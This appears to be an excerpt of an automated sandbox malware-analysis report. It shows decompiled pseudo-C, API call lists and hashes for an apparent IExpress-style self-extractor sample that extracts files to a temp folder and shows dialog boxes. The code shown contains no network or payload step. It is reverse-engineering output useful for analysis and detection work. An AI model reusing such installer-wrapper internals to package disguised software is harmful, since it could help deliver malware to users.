                                                                                                                                                                                                      					if(_t37 != 0) {
                                                                                                                                                                                                      						_t38 = E003E4224(_t64, _t46, _t46);
                                                                                                                                                                                                      						__eflags = _t38;
                                                                                                                                                                                                      						if(_t38 == 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0x3e87a0);
                                                                                                                                                                                                      						__eflags = _t39;
                                                                                                                                                                                                      						if(_t39 != 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t63 = 0x4c0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						E003E44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L38;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = 0x4b1;
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}

























                                                                                                                                                                                                      0x003e324c
                                                                                                                                                                                                      0x003e324c
                                                                                                                                                                                                      0x003e324f
                                                                                                                                                                                                      0x003e32c8
                                                                                                                                                                                                      0x003e32ce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e32ce
                                                                                                                                                                                                      0x003e3251
                                                                                                                                                                                                      0x003e3256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3271
                                                                                                                                                                                                      0x003e3277
                                                                                                                                                                                                      0x003e3279
                                                                                                                                                                                                      0x003e3298
                                                                                                                                                                                                      0x003e329d
                                                                                                                                                                                                      0x003e329f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e32b0
                                                                                                                                                                                                      0x003e32b6
                                                                                                                                                                                                      0x003e32b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e32be
                                                                                                                                                                                                      0x003e3280
                                                                                                                                                                                                      0x003e3289
                                                                                                                                                                                                      0x003e328e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e328e
                                                                                                                                                                                                      0x003e327b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e327b
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000003E8,003E8598,00000200), ref: 003E3271
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003E33E2
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 003E33F7
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 003E3410
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000836), ref: 003E3426
                                                                                                                                                                                                      • EnableWindow.USER32(00000000), ref: 003E342D
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 003E343F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$cent
                                                                                                                                                                                                      • API String ID: 2418873061-3212698739
                                                                                                                                                                                                      • Opcode ID: 94080f8a2d60acc89d539c2f63478550049cd07db278004abc23f337ce71cc0c
                                                                                                                                                                                                      • Instruction ID: 1cca8ba28be00bdd3a7c9801e941c5f15628f40b6f23b30491bc338b011fb9c8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94080f8a2d60acc89d539c2f63478550049cd07db278004abc23f337ce71cc0c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 015126303402F0BAEB335B375C8CFBF2A5D9B46B54F514728F245AB5C1CAA49E019762
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E003E2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				struct HRSRC__* _t31;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t43;
                                                                                                                                                                                                      				void* _t48;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t13 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                      				_t65 = 0;
                                                                                                                                                                                                      				_t66 = __ecx;
                                                                                                                                                                                                      				_t48 = __edx;
                                                                                                                                                                                                      				 *0x3e9a3c = __ecx;
                                                                                                                                                                                                      				memset(0x3e9140, 0, 0x8fc);
                                                                                                                                                                                                      				memset(0x3e8a20, 0, 0x32c);
                                                                                                                                                                                                      				memset(0x3e88c0, 0, 0x104);
                                                                                                                                                                                                      				 *0x3e93ec = 1;
                                                                                                                                                                                                      				_t20 = E003E468F("TITLE", 0x3e9154, 0x7f);
                                                                                                                                                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                      					_t64 = 0x4b1;
                                                                                                                                                                                                      					goto L32;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                      					 *0x3e858c = _t27;
                                                                                                                                                                                                      					SetEvent(_t27);
                                                                                                                                                                                                      					_t64 = 0x3e9a34;
                                                                                                                                                                                                      					if(E003E468F("EXTRACTOPT", 0x3e9a34, 4) != 0) {
                                                                                                                                                                                                      						if(( *0x3e9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                      							L12:
                                                                                                                                                                                                      							 *0x3e9120 =  *0x3e9120 & _t65;
                                                                                                                                                                                                      							if(E003E5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                      								if( *0x3e8a3a == 0) {
                                                                                                                                                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                      									if(_t31 != 0) {
                                                                                                                                                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0x3e8184 != 0) {
                                                                                                                                                                                                      										__imp__#17();
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0x3e8a24 == 0) {
                                                                                                                                                                                                      										_t57 = _t65;
                                                                                                                                                                                                      										if(E003E36EE(_t65) == 0) {
                                                                                                                                                                                                      											goto L33;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t33 =  *0x3e9a40; // 0x3
                                                                                                                                                                                                      											_t48 = 1;
                                                                                                                                                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                      												if(( *0x3e9a34 & 0x00000100) == 0 || ( *0x3e8a38 & 0x00000001) != 0 || E003E18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t64 = 0x7d6;
                                                                                                                                                                                                      													if(E003E6517(_t57, 0x7d6, _t34, E003E19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                      														goto L33;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												L30:
                                                                                                                                                                                                      												_t23 = _t48;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t23 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E003E2390(0x3e8a3a);
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t64 = 0x520;
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								E003E44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 =  &_v268;
                                                                                                                                                                                                      							if(E003E468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      								goto L3;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                      								 *0x3e8588 = _t43;
                                                                                                                                                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(( *0x3e9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                      										_t64 = 0x524;
                                                                                                                                                                                                      										if(E003E44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                      											goto L12;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L11;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t64 = 0x54b;
                                                                                                                                                                                                      										E003E44B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                      										L11:
                                                                                                                                                                                                      										CloseHandle( *0x3e8588);
                                                                                                                                                                                                      										 *0x3e9124 = 0x800700b7;
                                                                                                                                                                                                      										goto L33;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t64 = 0x4b1;
                                                                                                                                                                                                      						E003E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						 *0x3e9124 = 0x80070714;
                                                                                                                                                                                                      						L33:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x003e2f18

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E2CD9
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E2CE9
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E2CF9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E2D34
                                                                                                                                                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 003E2D40
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 003E2DAE
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 003E2DBD
                                                                                                                                                                                                      • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 003E2E0A
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                      • API String ID: 1002816675-2654900392
                                                                                                                                                                                                      • Opcode ID: ac7ab994a5c2b1a37de191caa83ea5eb51865bb89c664167d6cec9451cb3eb35
                                                                                                                                                                                                      • Instruction ID: 8b7a3069b3abacada9e2d811182e0a48f07a53a649a4a7d927f09baafbf79fee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac7ab994a5c2b1a37de191caa83ea5eb51865bb89c664167d6cec9451cb3eb35
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC51B4707403F1AAE737AB239C8ABBB269CDB85700F01473AFA45DD2D1DAB49C419711
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                                      			E003E34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				struct HWND__* _t35;
                                                                                                                                                                                                      				struct HWND__* _t38;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t9 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					 *0x3e91d8 = 1;
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					_push(_a4);
                                                                                                                                                                                                      					L21:
                                                                                                                                                                                                      					EndDialog();
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				_pop(1);
                                                                                                                                                                                                      				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                      				if(_t12 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                      					if(_a12 != 0x1b) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L19;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t13 = _t12 - 0xe;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t35 = _a4;
                                                                                                                                                                                                      					 *0x3e8584 = _t35;
                                                                                                                                                                                                      					E003E43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                      					__eflags =  *0x3e8184; // 0x1
                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                      					_t17 = CreateThread(0, 0, E003E4FE0, 0, 0, 0x3e8798);
                                                                                                                                                                                                      					 *0x3e879c = _t17;
                                                                                                                                                                                                      					__eflags = _t17;
                                                                                                                                                                                                      					if(_t17 != 0) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						E003E44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t35);
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t23 = _t13 - 1;
                                                                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 2;
                                                                                                                                                                                                      					if(_a12 != 2) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					ResetEvent( *0x3e858c);
                                                                                                                                                                                                      					_t38 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      					_t25 = E003E44B9(_t38, 0x4b2, 0x3e1140, 0, 0x20, 4);
                                                                                                                                                                                                      					__eflags = _t25 - 6;
                                                                                                                                                                                                      					if(_t25 == 6) {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						 *0x3e91d8 = 1;
                                                                                                                                                                                                      						SetEvent( *0x3e858c);
                                                                                                                                                                                                      						_t39 =  *0x3e879c; // 0x0
                                                                                                                                                                                                      						E003E3680(_t39);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t25 - 1;
                                                                                                                                                                                                      					if(_t25 == 1) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetEvent( *0x3e858c);
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t23 == 0xe90) {
                                                                                                                                                                                                      					TerminateThread( *0x3e879c, 0);
                                                                                                                                                                                                      					EndDialog(_a4, _a12);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • TerminateThread.KERNEL32(00000000), ref: 003E3535
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 003E3541
                                                                                                                                                                                                      • ResetEvent.KERNEL32 ref: 003E355F
                                                                                                                                                                                                      • SetEvent.KERNEL32(003E1140,00000000,00000020,00000004), ref: 003E3590
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003E35C7
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 003E35F1
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 003E35F8
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 003E3610
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 003E3617
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 003E3623
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,003E8798), ref: 003E3637
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 003E3671
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 2406144884-3940384054
                                                                                                                                                                                                      • Opcode ID: 7bb3d1d24cdae74013f9de29e66444b73de563d3eba53e43c756fc33873431de
                                                                                                                                                                                                      • Instruction ID: ba89ae99a944bb1e7f2896e5b8eb2baa725d8ee550040bc414cf0975df1fbbe2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bb3d1d24cdae74013f9de29e66444b73de563d3eba53e43c756fc33873431de
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 763191316402E0BBD7331F36ACCDE6A3A6DE786B01F114B29F6069E2E0CA719900DB51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                                                      			E003E4224(char __ecx) {
                                                                                                                                                                                                      				char* _v8;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				char* _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                                      				char _v48;
                                                                                                                                                                                                      				char _v52;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				char* _t61;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				char* _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				void* _t71;
                                                                                                                                                                                                      				char _t76;
                                                                                                                                                                                                      				intOrPtr _t85;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t67 = __ecx;
                                                                                                                                                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                      				if(_t66 == 0) {
                                                                                                                                                                                                      					_t63 = 0x4c2;
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					E003E44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                      				_v12 = _t26;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t63 = 0x4c1;
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                      				_v20 = _t28;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                      				_v16 = _t29;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t76 =  *0x3e88c0; // 0x0
                                                                                                                                                                                                      				if(_t76 != 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					 *0x3e87a0 = 0;
                                                                                                                                                                                                      					_v52 = _t67;
                                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                                      					_v44 = 0;
                                                                                                                                                                                                      					_v40 = 0x3e8598;
                                                                                                                                                                                                      					_v36 = 1;
                                                                                                                                                                                                      					_v32 = E003E4200;
                                                                                                                                                                                                      					_v28 = 0x3e88c0;
                                                                                                                                                                                                      					 *0x3ea288( &_v52);
                                                                                                                                                                                                      					_t32 =  *_v12();
                                                                                                                                                                                                      					if(_t71 != _t71) {
                                                                                                                                                                                                      						asm("int 0x29");
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_v12 = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						 *0x3ea288(_t32, 0x3e88c0);
                                                                                                                                                                                                      						 *_v16();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *0x3e88c0 != 0) {
                                                                                                                                                                                                      							E003E1680(0x3e87a0, 0x104, 0x3e88c0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0x3ea288(_v12);
                                                                                                                                                                                                      						 *_v20();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t85 =  *0x3e87a0; // 0x0
                                                                                                                                                                                                      					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					GetTempPathA(0x104, 0x3e88c0);
                                                                                                                                                                                                      					_t61 = 0x3e88c0;
                                                                                                                                                                                                      					_t4 =  &(_t61[1]); // 0x3e88c1
                                                                                                                                                                                                      					_t65 = _t4;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t42 =  *_t61;
                                                                                                                                                                                                      						_t61 =  &(_t61[1]);
                                                                                                                                                                                                      					} while (_t42 != 0);
                                                                                                                                                                                                      					_t5 = _t61 - _t65 + 0x3e88c0; // 0x7d1181
                                                                                                                                                                                                      					_t44 = CharPrevA(0x3e88c0, _t5);
                                                                                                                                                                                                      					_v8 = _t44;
                                                                                                                                                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0x3e88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                      						 *_v8 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





























                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 003E4236
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 003E424C
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 003E4263
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 003E427A
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,003E88C0,?,00000001), ref: 003E429F
                                                                                                                                                                                                      • CharPrevA.USER32(003E88C0,007D1181,?,00000001), ref: 003E42C2
                                                                                                                                                                                                      • CharPrevA.USER32(003E88C0,00000000,?,00000001), ref: 003E42D6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003E4391
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003E43A5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
